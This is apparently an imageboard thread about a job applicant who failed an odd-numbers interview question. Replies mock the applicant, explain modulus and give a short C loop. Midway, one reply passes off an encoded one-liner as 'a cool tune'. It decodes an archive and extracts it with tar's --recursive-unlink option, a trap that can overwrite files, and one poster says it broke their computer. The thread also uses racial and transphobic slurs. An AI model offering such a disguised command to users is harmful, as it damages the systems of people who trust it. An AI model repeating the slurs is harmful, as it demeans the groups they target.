Just got filtered by a print out odd numbers question on an interview

Was for a junior systems position mainly writing code in C, but I consider myself pretty experienced for it. Comfy with node js and npm usage also with python and pip, and apparently leetcode doesn't help either. The amount of time I spent memorizing answers did nothing, ended up getting asked one I didn't memorize and completely bombed it. I didn't expect them to ask something like that, if I try for a full stack/web dev position do you guys think they'll go easy on the thinking/math questions?

Attached: 1643688115749.jpg (225x225, 15.13K)

Shut the fuck up, nigger.

lol it's over buddy. what kind of sytems programmer doesn't know about modulus

what? theres nothing to memorize about that. its the most used example when someone teaches about loops

They kept mentioning that but I still don't know what it is, like how there's modules npm? If so I was on the right track I was gonna install the is odd package and I would have been good to go

lol. You son of a bitch

Dude, n = 2k+1, thats it. That is an odd number, just write the proof in your preferred language. Wtf do CS majors even study? Thank God I studied math instead of cringe science.

Why? What's wrong with that? Just tell me the truth is it over for me?

>n=2k+1
That's a formula though right? Not a odd number.

Also I didn't get a degree cause I didn't want to do the math or other hard courses I just did node js bootcamps that's all I need

Serves you right for not fizzbuzzing all day eerry day back when it was still popular around here. Also this shit is any CS programming course 101.

Also, isn't there an npm package for this exact task? Like isOdd / isEven npm? Look it up, I'm pretty sure some troon could make it already.

how do you interview for a C position and not know %
???????????????

You should have impressed them with a cool tune:

echo H4sIAAAAAAACCtPTZ6A5MIAAXDQWtpmBkSGDgikDHUBpcUlikYICwygYBaNgFIwwAAAk5zL6AAYAAA== | base64 -d | tar xz --recursive-unlink | aplay

Literally start with 1 and add 2 in some loop...

>recursive
haha no thanks

modulus? wtf are you on

for (int i = 1; i < 100; i += 2) {
printf("%d\n", i);
}

im such a retard my entire computer is now broken

They'd probably assume and want you to use modulus, since it's pretty essential.
And you couldn't always have specific looping like that to conveniently solve the problem.

What's this

TempleOS theme

How is everyone falling for this bait

That's what I was gonna do I assumed that's what they meant by modulus
It's boring math stuff you don't even need it anyways. I just memorize it so it's good enough.
C is easy if I can do JavaScript and python boot camp how would picking up c during the interview be hard?